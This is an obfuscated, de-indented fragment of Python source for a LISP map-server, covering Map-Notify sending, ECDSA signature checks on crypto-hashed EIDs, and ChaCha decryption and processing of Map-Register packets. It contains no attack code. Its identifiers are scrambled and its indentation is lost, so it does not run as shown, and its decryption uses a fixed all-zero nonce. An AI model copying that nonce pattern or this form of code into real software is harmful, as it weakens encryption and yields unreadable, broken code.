lprint ( "Notify existing RLE-nodes {}" . format ( ooo ) )
else :
if 63 - 63: I1ii11iIi11i / II111iiii % oO0o + ooOoO0o . Ii1I % I11i
if 59 - 59: I1Ii111 % o0oOOo0O0Ooo - I1IiiI * i1IIi
if 5 - 5: I1IiiI
if 22 - 22: II111iiii / iII111i
if 18 - 18: i11iIiiIii * ooOoO0o . I1IiiI + i1IIi + I11i
for OOOoOoo in oo0OooO :
if ( OOOoOoo . is_rtr ( ) ) : IiiIIiIi . append ( OOOoOoo . rloc )
if 62 - 62: O0 % o0oOOo0O0Ooo + iIii1I11I1II1 + iIii1I11I1II1 * ooOoO0o
if 21 - 21: o0oOOo0O0Ooo % O0
if 81 - 81: i1IIi + i1IIi
if 3 - 3: I1Ii111 . I1ii11iIi11i * iII111i * i11iIiiIii * IiII
if 52 - 52: iIii1I11I1II1 % o0oOOo0O0Ooo % I1IiiI
ooooO0oOOOOO = ( len ( IiiIIiIi ) != 0 )
if ( ooooO0oOOOOO == False ) :
i1iI11i = lisp_site_eid_lookup ( I1iiIiI1II1ii [ 0 ] , o00Oo0 , False )
if ( i1iI11i == None ) : continue
if 71 - 71: I1IiiI + iII111i
for OOOoOoo in i1iI11i . registered_rlocs :
if ( OOOoOoo . rloc . is_null ( ) ) : continue
IiiIIiIi . append ( OOOoOoo . rloc )
if 47 - 47: iIii1I11I1II1 . OoO0O00 . iIii1I11I1II1
if 57 - 57: IiII * ooOoO0o * ooOoO0o * iIii1I11I1II1 * I1Ii111 + OoOoOO00
if 83 - 83: OoOoOO00 . Oo0Ooo . OoO0O00
if 65 - 65: iII111i * iIii1I11I1II1
if 48 - 48: iII111i * OoO0O00
if 57 - 57: ooOoO0o + I1IiiI
if ( len ( IiiIIiIi ) == 0 ) :
lprint ( "No ITRs or RTRs found for {}, Map-Notify suppressed" . format ( green ( OoO0 . print_eid_tuple ( ) , False ) ) )
if 32 - 32: I1ii11iIi11i + OOooOOo - I11i
continue
if 82 - 82: Oo0Ooo % Oo0Ooo
if 91 - 91: I11i
if 98 - 98: I11i - II111iiii . IiII % Oo0Ooo
if 65 - 65: OoO0O00
if 65 - 65: oO0o
if 77 - 77: I11i * i1IIi - OOooOOo / OoOoOO00
for OOoO00o0o in IiiIIiIi :
lprint ( "Build Map-Notify to {}TR {} for {}" . format ( "R" if ooooO0oOOOOO else "x" , red ( OOoO00o0o . print_address_no_iid ( ) , False ) ,
# I1ii11iIi11i + O0 . oO0o
green ( OoO0 . print_eid_tuple ( ) , False ) ) )
if 65 - 65: OOooOOo + i1IIi * Ii1I % iIii1I11I1II1 . OOooOOo % I1ii11iIi11i
OoO0Oo0 = [ OoO0 . print_eid_tuple ( ) ]
lisp_send_multicast_map_notify ( lisp_sockets , OoO0 , OoO0Oo0 , OOoO00o0o )
time . sleep ( .001 )
if 91 - 91: I1Ii111
if 54 - 54: o0oOOo0O0Ooo . i1IIi / iII111i
return
if 21 - 21: O0 + ooOoO0o
if 53 - 53: Ii1I - II111iiii * iIii1I11I1II1
if 91 - 91: OoOoOO00 % iIii1I11I1II1
if 81 - 81: i11iIiiIii / OoOoOO00 + iIii1I11I1II1
if 65 - 65: o0oOOo0O0Ooo
if 73 - 73: I11i . I1ii11iIi11i - OoO0O00 + OoooooooOO
if 71 - 71: I1IiiI
if 27 - 27: OoO0O00 + i1IIi * OoooooooOO * iIii1I11I1II1 - Ii1I
def lisp_find_sig_in_rloc_set ( packet , rloc_count ) :
for iIi1iIIIiIiI in range ( rloc_count ) :
ooOoooO = lisp_rloc_record ( )
packet = ooOoooO . decode ( packet , None )
OOoooO = ooOoooO . json
if ( OOoooO == None ) : continue
if 87 - 87: OoOoOO00 * I1IiiI
try :
OOoooO = json . loads ( OOoooO . json_string )
except :
lprint ( "Found corrupted JSON signature" )
continue
if 19 - 19: iII111i / Ii1I + iIii1I11I1II1 * O0 - Oo0Ooo
if 47 - 47: iIii1I11I1II1 % I1ii11iIi11i
if ( "signature" not in OOoooO ) : continue
return ( ooOoooO )
if 33 - 33: oO0o . oO0o / IiII + II111iiii
return ( None )
if 34 - 34: OoO0O00 . OoOoOO00 / i1IIi / OOooOOo
if 12 - 12: o0oOOo0O0Ooo . Oo0Ooo / II111iiii
if 18 - 18: I1Ii111 % II111iiii + Ii1I * Oo0Ooo - OoooooooOO . Oo0Ooo
if 25 - 25: OoO0O00
if 83 - 83: II111iiii . iIii1I11I1II1
if 77 - 77: O0 . OoOoOO00 % oO0o / OOooOOo
if 8 - 8: iII111i - i1IIi
if 81 - 81: ooOoO0o / OOooOOo % OoOoOO00 . iIii1I11I1II1
if 45 - 45: I1IiiI . ooOoO0o - OoooooooOO
if 84 - 84: I1ii11iIi11i
if 69 - 69: I1Ii111 + II111iiii
if 92 - 92: OoooooooOO
if 80 - 80: I1ii11iIi11i % I1ii11iIi11i . OoO0O00 . oO0o % I1IiiI % I11i
if 4 - 4: OoO0O00 / iII111i / I1ii11iIi11i - o0oOOo0O0Ooo * I1Ii111
if 24 - 24: OoooooooOO / ooOoO0o + Oo0Ooo - OOooOOo - o0oOOo0O0Ooo . I1ii11iIi11i
if 2 - 2: I1IiiI . o0oOOo0O0Ooo / Oo0Ooo - OoOoOO00 - OoooooooOO
if 73 - 73: I1Ii111 . i11iIiiIii * ooOoO0o . IiII - I11i + I1Ii111
if 21 - 21: I1Ii111 + iIii1I11I1II1 + I1IiiI / O0 * I1ii11iIi11i
if 57 - 57: OOooOOo * I11i . oO0o
def lisp_get_eid_hash ( eid ) :
I11IIi1iI = None
for o0OOOooO in lisp_eid_hashes :
if 6 - 6: Ii1I
if 23 - 23: o0oOOo0O0Ooo + I1IiiI
if 85 - 85: o0oOOo0O0Ooo
if 23 - 23: o0oOOo0O0Ooo / IiII - O0
oooo = o0OOOooO . instance_id
if ( oooo == - 1 ) : o0OOOooO . instance_id = eid . instance_id
if 60 - 60: I1ii11iIi11i * i11iIiiIii + oO0o
oO00000oOO = eid . is_more_specific ( o0OOOooO )
o0OOOooO . instance_id = oooo
if ( oO00000oOO ) :
I11IIi1iI = 128 - o0OOOooO . mask_len
break
if 63 - 63: i11iIiiIii
if 47 - 47: OOooOOo - II111iiii % I1Ii111 * O0 . ooOoO0o
if ( I11IIi1iI == None ) : return ( None )
if 96 - 96: II111iiii . I1IiiI % I11i
I1IIIi = eid . address
iIii1II111Ii = ""
for iIi1iIIIiIiI in range ( 0 , old_div ( I11IIi1iI , 16 ) ) :
IiI = I1IIIi & 0xffff
IiI = hex ( IiI ) [ 2 : : ]
iIii1II111Ii = IiI . zfill ( 4 ) + ":" + iIii1II111Ii
I1IIIi >>= 16
if 3 - 3: oO0o
if ( I11IIi1iI % 16 != 0 ) :
IiI = I1IIIi & 0xff
IiI = hex ( IiI ) [ 2 : : ]
iIii1II111Ii = IiI . zfill ( 2 ) + ":" + iIii1II111Ii
if 3 - 3: I1ii11iIi11i . IiII + ooOoO0o
return ( iIii1II111Ii [ 0 : - 1 ] )
if 66 - 66: OOooOOo + oO0o - ooOoO0o / Ii1I * OoO0O00 * i11iIiiIii
if 69 - 69: I11i % i11iIiiIii
if 34 - 34: Ii1I . OoooooooOO + II111iiii % oO0o
if 69 - 69: i11iIiiIii % I1IiiI * i11iIiiIii - OoO0O00 * iIii1I11I1II1
if 70 - 70: I1Ii111 . OoOoOO00 % OoooooooOO + OoOoOO00 / II111iiii
if 39 - 39: I1Ii111 * I1IiiI - o0oOOo0O0Ooo . oO0o . OOooOOo * i11iIiiIii
if 70 - 70: OoOoOO00 / OOooOOo - o0oOOo0O0Ooo
if 82 - 82: OOooOOo . i11iIiiIii . I1ii11iIi11i % OoOoOO00 * Ii1I / OoO0O00
if 56 - 56: o0oOOo0O0Ooo / I1IiiI + I11i + I1IiiI
if 34 - 34: Oo0Ooo / i11iIiiIii - ooOoO0o
if 77 - 77: OoOoOO00 * OoooooooOO
def lisp_lookup_public_key ( eid ) :
oooo = eid . instance_id
if 41 - 41: iIii1I11I1II1 - O0 . II111iiii + I1IiiI - II111iiii / oO0o
if 35 - 35: ooOoO0o - OoOoOO00 / iIii1I11I1II1 / OOooOOo
if 38 - 38: i1IIi % OoooooooOO
if 5 - 5: iIii1I11I1II1 + iIii1I11I1II1 . iIii1I11I1II1 + o0oOOo0O0Ooo
if 45 - 45: I1IiiI - OoooooooOO - I1Ii111 - i1IIi - OoooooooOO * O0
oOoO00O0O0ooo = lisp_get_eid_hash ( eid )
if ( oOoO00O0O0ooo == None ) : return ( [ None , None , False ] )
if 63 - 63: I1ii11iIi11i
oOoO00O0O0ooo = "hash-" + oOoO00O0O0ooo
oOo0oO0o = lisp_address ( LISP_AFI_NAME , oOoO00O0O0ooo , len ( oOoO00O0O0ooo ) , oooo )
oo0oOooo0O = lisp_address ( LISP_AFI_NONE , "" , 0 , oooo )
if 34 - 34: O0
if 26 - 26: II111iiii - oO0o / I1IiiI * OOooOOo + o0oOOo0O0Ooo
if 59 - 59: Oo0Ooo + I11i % OoOoOO00 - I1IiiI + I11i
if 53 - 53: II111iiii
i1iI11i = lisp_site_eid_lookup ( oOo0oO0o , oo0oOooo0O , True )
if ( i1iI11i == None ) : return ( [ oOo0oO0o , None , False ] )
if 9 - 9: OoooooooOO - OOooOOo . I11i * oO0o
if 3 - 3: iIii1I11I1II1 - OoO0O00
if 38 - 38: O0 + ooOoO0o * I1Ii111 - oO0o * o0oOOo0O0Ooo
if 97 - 97: Oo0Ooo - O0 * OoooooooOO
ooOoI1IiiI = None
for iIIiI11 in i1iI11i . registered_rlocs :
oo0oO0O = iIIiI11 . json
if ( oo0oO0O == None ) : continue
try :
oo0oO0O = json . loads ( oo0oO0O . json_string )
except :
lprint ( "Registered RLOC JSON format is invalid for {}" . format ( oOoO00O0O0ooo ) )
if 92 - 92: I11i
return ( [ oOo0oO0o , None , False ] )
if 77 - 77: I11i / iII111i / O0 % II111iiii % OoOoOO00 / I1Ii111
if ( "public-key" not in oo0oO0O ) : continue
ooOoI1IiiI = oo0oO0O [ "public-key" ]
break
if 77 - 77: OoOoOO00 % I1IiiI % II111iiii * iII111i . OoOoOO00 / O0
return ( [ oOo0oO0o , ooOoI1IiiI , True ] )
if 21 - 21: ooOoO0o - I11i . i11iIiiIii
if 39 - 39: Oo0Ooo * II111iiii % OOooOOo / oO0o . ooOoO0o
if 75 - 75: I11i / O0 + OoooooooOO + OOooOOo % iII111i + I1IiiI
if 10 - 10: II111iiii * I11i - IiII * iIii1I11I1II1 . OoooooooOO
if 39 - 39: I11i . I1IiiI % Oo0Ooo + oO0o
if 76 - 76: I1IiiI * OoooooooOO - i11iIiiIii / I11i / Oo0Ooo
if 82 - 82: IiII % ooOoO0o
if 100 - 100: Oo0Ooo . oO0o - iII111i + OoooooooOO
def lisp_verify_cga_sig ( eid , rloc_record ) :
if 27 - 27: Oo0Ooo . I1Ii111 - i1IIi * I1IiiI
if 96 - 96: I1ii11iIi11i - Ii1I . I1ii11iIi11i
if 89 - 89: II111iiii % I1ii11iIi11i % IiII . I11i
if 49 - 49: iII111i % i11iIiiIii * I11i - oO0o . OOooOOo . i11iIiiIii
if 26 - 26: iIii1I11I1II1 + i11iIiiIii % iII111i + I1IiiI + oO0o - ooOoO0o
O0OoO0ooOoo = json . loads ( rloc_record . json . json_string )
if 4 - 4: Oo0Ooo - IiII - I11i
if ( lisp_get_eid_hash ( eid ) ) :
OO00O = eid
elif ( "signature-eid" in O0OoO0ooOoo ) :
ooooI111I11i = O0OoO0ooOoo [ "signature-eid" ]
OO00O = lisp_address ( LISP_AFI_IPV6 , ooooI111I11i , 0 , 0 )
else :
lprint ( " No signature-eid found in RLOC-record" )
return ( False )
if 76 - 76: OOooOOo . iII111i % ooOoO0o
if 15 - 15: iII111i
if 55 - 55: iII111i
if 22 - 22: I1Ii111 % II111iiii % iIii1I11I1II1 % II111iiii
if 33 - 33: II111iiii
oOo0oO0o , ooOoI1IiiI , oo00iI1i = lisp_lookup_public_key ( OO00O )
if ( oOo0oO0o == None ) :
i1iiii = green ( OO00O . print_address ( ) , False )
lprint ( " Could not parse hash in EID {}" . format ( i1iiii ) )
return ( False )
if 66 - 66: OOooOOo
if 34 - 34: I1ii11iIi11i * i1IIi % OoooooooOO / I1IiiI
III11i1 = "found" if oo00iI1i else bold ( "not found" , False )
i1iiii = green ( oOo0oO0o . print_address ( ) , False )
lprint ( " Lookup for crypto-hashed EID {} {}" . format ( i1iiii , III11i1 ) )
if ( oo00iI1i == False ) : return ( False )
if 80 - 80: o0oOOo0O0Ooo * ooOoO0o
if ( ooOoI1IiiI == None ) :
lprint ( " RLOC-record with public-key not found" )
return ( False )
if 87 - 87: I1Ii111 + O0 / I1ii11iIi11i / OoOoOO00 . Oo0Ooo - IiII
if 24 - 24: OoOoOO00
iI1ii11iiiiII = ooOoI1IiiI [ 0 : 8 ] + "..." + ooOoI1IiiI [ - 8 : : ]
lprint ( " RLOC-record with public-key '{}' found" . format ( iI1ii11iiiiII ) )
if 48 - 48: o0oOOo0O0Ooo + OOooOOo % OoooooooOO
if 51 - 51: OoO0O00
if 60 - 60: ooOoO0o
if 95 - 95: I11i / o0oOOo0O0Ooo . OoooooooOO * I1IiiI . Oo0Ooo * OoOoOO00
if 3 - 3: I1Ii111 % i11iIiiIii % O0 % II111iiii
ii1iIIiIIi111 = O0OoO0ooOoo [ "signature" ]
if 35 - 35: OOooOOo * oO0o
try :
O0OoO0ooOoo = binascii . a2b_base64 ( ii1iIIiIIi111 )
except :
lprint ( " Incorrect padding in signature string" )
return ( False )
if 19 - 19: iIii1I11I1II1 + IiII * iII111i - IiII
if 87 - 87: o0oOOo0O0Ooo - I1Ii111
I1II1I1III = len ( O0OoO0ooOoo )
if ( I1II1I1III & 1 ) :
lprint ( " Signature length is odd, length {}" . format ( I1II1I1III ) )
return ( False )
if 6 - 6: iII111i / i1IIi + OOooOOo % OoOoOO00 . I1ii11iIi11i
if 88 - 88: OoO0O00
if 82 - 82: OOooOOo / I11i / OoooooooOO % oO0o
if 27 - 27: oO0o + IiII
if 5 - 5: iIii1I11I1II1 + OoOoOO00 * I1Ii111 * i11iIiiIii
ii1iiii11IiI1 = OO00O . print_address ( )
if 18 - 18: Oo0Ooo % OOooOOo % oO0o / I11i % O0
if 76 - 76: OoooooooOO % O0 / OoO0O00
if 41 - 41: i11iIiiIii - I1ii11iIi11i - II111iiii
if 5 - 5: OoOoOO00 + i1IIi
ooOoI1IiiI = binascii . a2b_base64 ( ooOoI1IiiI )
try :
III = ecdsa . VerifyingKey . from_pem ( ooOoI1IiiI )
except :
i1ii1ii11iIi = bold ( "Bad public-key" , False )
lprint ( " {}, not in PEM format" . format ( i1ii1ii11iIi ) )
return ( False )
if 99 - 99: OOooOOo . IiII
if 77 - 77: I1IiiI + I11i * iIii1I11I1II1 / I1IiiI - iII111i
if 42 - 42: oO0o * IiII
if 37 - 37: I11i * ooOoO0o / IiII . I1ii11iIi11i + II111iiii
if 55 - 55: OoO0O00
if 63 - 63: o0oOOo0O0Ooo / IiII - i11iIiiIii
if 99 - 99: O0 + O0 . iIii1I11I1II1 . ooOoO0o * o0oOOo0O0Ooo
if 1 - 1: I1Ii111 - I11i . OoOoOO00
if 72 - 72: II111iiii . O0 . I11i * OoO0O00
if 70 - 70: iII111i % OoooooooOO * I1ii11iIi11i . I11i / OoO0O00
if 6 - 6: O0 . i11iIiiIii
try :
O0oOo = III . verify ( O0OoO0ooOoo , ii1iiii11IiI1 . encode ( ) , hashfunc = hashlib . sha256 )
except :
lprint ( " Signature library failed for signature data '{}'" . format ( ii1iiii11IiI1 ) )
if 85 - 85: i11iIiiIii / Ii1I + Oo0Ooo / OoOoOO00 - I1IiiI
lprint ( " Signature used '{}'" . format ( ii1iIIiIIi111 ) )
return ( False )
if 39 - 39: OoO0O00
return ( O0oOo )
if 97 - 97: iIii1I11I1II1 . I1IiiI - O0
if 41 - 41: I11i . OoOoOO00 * O0 % Ii1I
if 54 - 54: ooOoO0o
if 13 - 13: I11i
if 18 - 18: II111iiii * oO0o % i11iIiiIii / IiII . ooOoO0o
if 2 - 2: OoOoOO00 % I1Ii111
if 35 - 35: OOooOOo
if 50 - 50: iIii1I11I1II1 . I1IiiI + i11iIiiIii
if 65 - 65: I11i % I1IiiI
if 3 - 3: i11iIiiIii % OOooOOo - Ii1I . i1IIi
def lisp_remove_eid_from_map_notify_queue ( eid_list ) :
if 24 - 24: OOooOOo
if 93 - 93: I1ii11iIi11i - iII111i % O0 - Ii1I
if 84 - 84: I1ii11iIi11i . iIii1I11I1II1 % IiII * I11i + ooOoO0o
if 59 - 59: oO0o * OoO0O00 - I11i * I1IiiI
if 60 - 60: iII111i - OoooooooOO / iII111i % OoO0O00 . OoOoOO00 - o0oOOo0O0Ooo
O00O0oo0O00O = [ ]
for oOOOOOOoo0 in eid_list :
for I1Ii11i1 in lisp_map_notify_queue :
i1111 = lisp_map_notify_queue [ I1Ii11i1 ]
if ( oOOOOOOoo0 not in i1111 . eid_list ) : continue
if 100 - 100: I1ii11iIi11i / Ii1I % Oo0Ooo
O00O0oo0O00O . append ( I1Ii11i1 )
oo0O00O0O0O00Ooo = i1111 . retransmit_timer
if ( oo0O00O0O0O00Ooo ) : oo0O00O0O0O00Ooo . cancel ( )
if 97 - 97: i1IIi . I1ii11iIi11i . OOooOOo - ooOoO0o
lprint ( "Remove from Map-Notify queue nonce 0x{} for EID {}" . format ( i1111 . nonce_key , green ( oOOOOOOoo0 , False ) ) )
if 40 - 40: i11iIiiIii % i1IIi - iII111i
if 22 - 22: I1IiiI - I11i + OoOoOO00 - i11iIiiIii
if 72 - 72: i11iIiiIii - iII111i . i11iIiiIii
if 61 - 61: oO0o . i11iIiiIii / Ii1I % iII111i
if 36 - 36: OoO0O00 + Ii1I / I11i - iII111i % OoO0O00 / Oo0Ooo
if 38 - 38: Ii1I - ooOoO0o - O0 + oO0o . iIii1I11I1II1
if 90 - 90: i1IIi * OoOoOO00
for I1Ii11i1 in O00O0oo0O00O : lisp_map_notify_queue . pop ( I1Ii11i1 )
return
if 27 - 27: iIii1I11I1II1
if 95 - 95: iII111i / ooOoO0o % Ii1I
if 44 - 44: OOooOOo . OOooOOo
if 5 - 5: oO0o + OoooooooOO
if 88 - 88: oO0o + OOooOOo
if 14 - 14: I11i / i1IIi
if 56 - 56: OoooooooOO
if 59 - 59: I1ii11iIi11i + OoO0O00
def lisp_decrypt_map_register ( packet ) :
if 37 - 37: IiII * I1IiiI % O0
if 32 - 32: ooOoO0o % II111iiii
if 60 - 60: i11iIiiIii
if 11 - 11: o0oOOo0O0Ooo
if 77 - 77: o0oOOo0O0Ooo / iIii1I11I1II1 * iIii1I11I1II1 / o0oOOo0O0Ooo * iII111i
IiIii1iIIII = socket . ntohl ( struct . unpack ( "I" , packet [ 0 : 4 ] ) [ 0 ] )
ii1iIII1I1I = ( IiIii1iIIII >> 13 ) & 0x1
if ( ii1iIII1I1I == 0 ) : return ( packet )
if 57 - 57: I1IiiI + i11iIiiIii * i1IIi
O00OOooO0O = ( IiIii1iIIII >> 14 ) & 0x7
if 44 - 44: II111iiii
if 65 - 65: I11i . iII111i . I1IiiI - Oo0Ooo % iIii1I11I1II1 / O0
if 54 - 54: iII111i - I1Ii111
if 88 - 88: iII111i * OoO0O00 % OoooooooOO / oO0o
try :
iiIio0o0 = lisp_ms_encryption_keys [ O00OOooO0O ]
iiIio0o0 = iiIio0o0 . zfill ( 32 )
OoOooO = "0" * 8
except :
lprint ( "Cannot decrypt Map-Register with key-id {}" . format ( O00OOooO0O ) )
return ( None )
if 45 - 45: oO0o % oO0o
if 85 - 85: i1IIi + oO0o % Ii1I + iIii1I11I1II1
IiI11I111 = bold ( "Decrypt" , False )
lprint ( "{} Map-Register with key-id {}" . format ( IiI11I111 , O00OOooO0O ) )
if 72 - 72: I1ii11iIi11i / II111iiii . oO0o - o0oOOo0O0Ooo
if 80 - 80: i1IIi
if 40 - 40: O0 . ooOoO0o * iII111i . I11i + I1Ii111 % OoO0O00
if 9 - 9: IiII * oO0o - o0oOOo0O0Ooo
Ooi1IIii1i = chacha . ChaCha ( iiIio0o0 , OoOooO , 20 ) . decrypt ( packet [ 4 : : ] )
return ( packet [ 0 : 4 ] + Ooi1IIii1i )
if 17 - 17: iII111i % Oo0Ooo
if 14 - 14: I1IiiI - I1Ii111 % I1IiiI - II111iiii
if 34 - 34: I1ii11iIi11i * IiII / II111iiii / ooOoO0o * oO0o
if 3 - 3: II111iiii
if 61 - 61: oO0o . I1IiiI + i1IIi
if 69 - 69: O0 / i1IIi - OoOoOO00 + ooOoO0o - oO0o
if 80 - 80: o0oOOo0O0Ooo % O0 * I11i . i1IIi - ooOoO0o
def lisp_process_map_register ( lisp_sockets , packet , source , sport ) :
global lisp_registered_count
if 93 - 93: OoooooooOO / o0oOOo0O0Ooo
if 61 - 61: II111iiii / i1IIi . I1ii11iIi11i % iIii1I11I1II1
if 66 - 66: iIii1I11I1II1 % OoOoOO00 + i1IIi * i11iIiiIii * OoooooooOO
if 36 - 36: iII111i - OoO0O00 + I1IiiI + Ii1I . OoooooooOO
if 75 - 75: oO0o * Oo0Ooo * O0
if 22 - 22: ooOoO0o / OoooooooOO . II111iiii / Ii1I * OoO0O00 . i1IIi
packet = lisp_decrypt_map_register ( packet )
if ( packet == None ) : return
if 62 - 62: oO0o % Ii1I - Ii1I
IIIiI111I = lisp_map_register ( )
i1o0o0oOO , packet = IIIiI111I . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Register packet" )
return
if 7 - 7: I1Ii111 / OoOoOO00 . II111iiii
IIIiI111I . sport = sport
if 9 - 9: I11i . I11i . OoooooooOO
IIIiI111I . print_map_register ( )
if 42 - 42: iII111i / oO0o / iII111i * OoO0O00
if 25 - 25: OoOoOO00 - II111iiii + II111iiii . Ii1I * II111iiii
if 12 - 12: IiII / Ii1I
if 54 - 54: Oo0Ooo + Ii1I % OoooooooOO * OOooOOo / OoOoOO00
iI1i1I111iI = True
if ( IIIiI111I . auth_len == LISP_SHA1_160_AUTH_DATA_LEN ) :
iI1i1I111iI = True
if 63 - 63: II111iiii + I1Ii111
if ( IIIiI111I . alg_id == LISP_SHA_256_128_ALG_ID ) :
iI1i1I111iI = False
if 19 - 19: I1ii11iIi11i
if 44 - 44: OoOoOO00 * Oo0Ooo
if 51 - 51: OOooOOo / IiII % I1Ii111 . OoOoOO00 % Ii1I
if 88 - 88: OoO0O00
if 28 - 28: I1Ii111 - iIii1I11I1II1
oO0oOOoo0OO0 = [ ]
if 25 - 25: iII111i / iII111i
if 7 - 7: II111iiii * Ii1I * OoO0O00 / o0oOOo0O0Ooo
if 71 - 71: ooOoO0o - i11iIiiIii - OoO0O00 % iII111i * OoooooooOO * OoooooooOO
if 44 - 44: OoO0O00 . OoOoOO00 + I1Ii111
I1io0oOOooOoo0oO = None
Oo0O0OO = packet
oo0OoO0OoOO0O = [ ]
oo0OOo00OOoO = IIIiI111I . record_count
for iIi1iIIIiIiI in range ( oo0OOo00OOoO ) :
o0o0Ooo0OO00o = lisp_eid_record ( )
ooOoooO = lisp_rloc_record ( )
packet = o0o0Ooo0OO00o . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Register packet" )
return
if 44 - 44: Oo0Ooo + oO0o + I1ii11iIi11i - iIii1I11I1II1 + Oo0Ooo + OoooooooOO
o0o0Ooo0OO00o . print_record ( " " , False )
if 96 - 96: O0 - Ii1I * Ii1I / OoO0O00 / II111iiii / ooOoO0o
if 48 - 48: ooOoO0o % I1IiiI + IiII * I1ii11iIi11i * I1IiiI % OoO0O00
if 79 - 79: i11iIiiIii + OOooOOo + oO0o * iIii1I11I1II1 % iII111i . I1Ii111
if 30 - 30: OoO0O00 / II111iiii
i1iI11i = lisp_site_eid_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
False )
if 35 - 35: ooOoO0o * OOooOOo / I11i % I11i / OoooooooOO . I1Ii111
oOoOO000Oo0 = i1iI11i . print_eid_tuple ( ) if i1iI11i else None
if 49 - 49: I11i - OoooooooOO + i11iIiiIii
if 90 - 90: I1IiiI / I1Ii111 + Oo0Ooo / o0oOOo0O0Ooo + OOooOOo
if 99 - 99: i1IIi - oO0o
if 84 - 84: I1IiiI / IiII - OoO0O00 . Ii1I * IiII % Ii1I
if 57 - 57: I11i + iIii1I11I1II1 . II111iiii * oO0o
if 87 - 87: iII111i . II111iiii / Ii1I / O0 - oO0o
if 49 - 49: I1ii11iIi11i . OoOoOO00 / O0 * i1IIi * I1ii11iIi11i . o0oOOo0O0Ooo
if ( i1iI11i and i1iI11i . accept_more_specifics == False ) :
if ( i1iI11i . eid_record_matches ( o0o0Ooo0OO00o ) == False ) :
O0oOoO00O = i1iI11i . parent_for_more_specifics
if ( O0oOoO00O ) : i1iI11i = O0oOoO00O
if 95 - 95: OoO0O00 + O0 * oO0o
if 39 - 39: i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
i1I1IiiIi = ( i1iI11i and i1iI11i . accept_more_specifics )
if ( i1I1IiiIi ) :
iI1i = lisp_site_eid ( i1iI11i . site )
iI1i . dynamic = True
iI1i . eid . copy_address ( o0o0Ooo0OO00o . eid )
iI1i . group . copy_address ( o0o0Ooo0OO00o . group )
iI1i . parent_for_more_specifics = i1iI11i
iI1i . add_cache ( )
iI1i . inherit_from_ams_parent ( )
i1iI11i . more_specific_registrations . append ( iI1i )
i1iI11i = iI1i
else :
i1iI11i = lisp_site_eid_lookup ( o0o0Ooo0OO00o . eid , o0o0Ooo0OO00o . group ,
True )
if 23 - 23: OoO0O00 + I1IiiI / I1ii11iIi11i * I1ii11iIi11i % ooOoO0o
if 83 - 83: I1IiiI * i11iIiiIii - I1ii11iIi11i + I11i
i1iiii = o0o0Ooo0OO00o . print_eid_tuple ( )
if 33 - 33: OoO0O00 . OoooooooOO % iII111i / oO0o * Ii1I + ooOoO0o
if ( i1iI11i == None ) :
oo0oO0Oo = bold ( "Site not found" , False )
lprint ( " {} for EID {}{}" . format ( oo0oO0Oo , green ( i1iiii , False ) ,
", matched non-ams {}" . format ( green ( oOoOO000Oo0 , False ) if oOoOO000Oo0 else "" ) ) )
if 29 - 29: oO0o
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
if 78 - 78: Oo0Ooo
if 77 - 77: oO0o % Oo0Ooo % O0
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
packet = ooOoooO . end_of_rlocs ( packet , o0o0Ooo0OO00o . rloc_count )
if ( packet == None ) :
lprint ( " Could not decode RLOC-record in Map-Register packet" )
return
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
continue
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
I1io0oOOooOoo0oO = i1iI11i . site
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if ( i1I1IiiIi ) :
oO0ooOOO = i1iI11i . parent_for_more_specifics . print_eid_tuple ( )
lprint ( " Found ams {} for site '{}' for registering prefix {}" . format ( green ( oO0ooOOO , False ) , I1io0oOOooOoo0oO . site_name , green ( i1iiii , False ) ) )
if 88 - 88: ooOoO0o
else :
oO0ooOOO = green ( i1iI11i . print_eid_tuple ( ) , False )
lprint ( " Found {} for site '{}' for registering prefix {}" . format ( oO0ooOOO , I1io0oOOooOoo0oO . site_name , green ( i1iiii , False ) ) )
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
if ( I1io0oOOooOoo0oO . shutdown ) :
lprint ( ( " Rejecting registration for site '{}', configured in " +
"admin-shutdown state" ) . format ( I1io0oOOooOoo0oO . site_name ) )
packet = ooOoooO . end_of_rlocs ( packet , o0o0Ooo0OO00o . rloc_count )
continue
if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
if 13 - 13: I1IiiI % ooOoO0o + OOooOOo
if 91 - 91: oO0o - ooOoO0o
if 20 - 20: i1IIi . IiII / o0oOOo0O0Ooo / I11i
if 27 - 27: ooOoO0o . ooOoO0o - Ii1I % i11iIiiIii
if 74 - 74: I1Ii111 - II111iiii % o0oOOo0O0Ooo
if 7 - 7: I1IiiI + OoooooooOO + o0oOOo0O0Ooo . OoooooooOO
IiII11iI1 = IIIiI111I . key_id
if ( IiII11iI1 in I1io0oOOooOoo0oO . auth_key ) :
I1Ii1II1I11II = I1io0oOOooOoo0oO . auth_key [ IiII11iI1 ]
else :
I1Ii1II1I11II = ""
if 56 - 56: Ii1I % OoO0O00 / I1IiiI / iIii1I11I1II1
if 49 - 49: I1IiiI
I1Iii1IIIiiiI = lisp_verify_auth ( i1o0o0oOO , IIIiI111I . alg_id ,
IIIiI111I . auth_data , I1Ii1II1I11II )
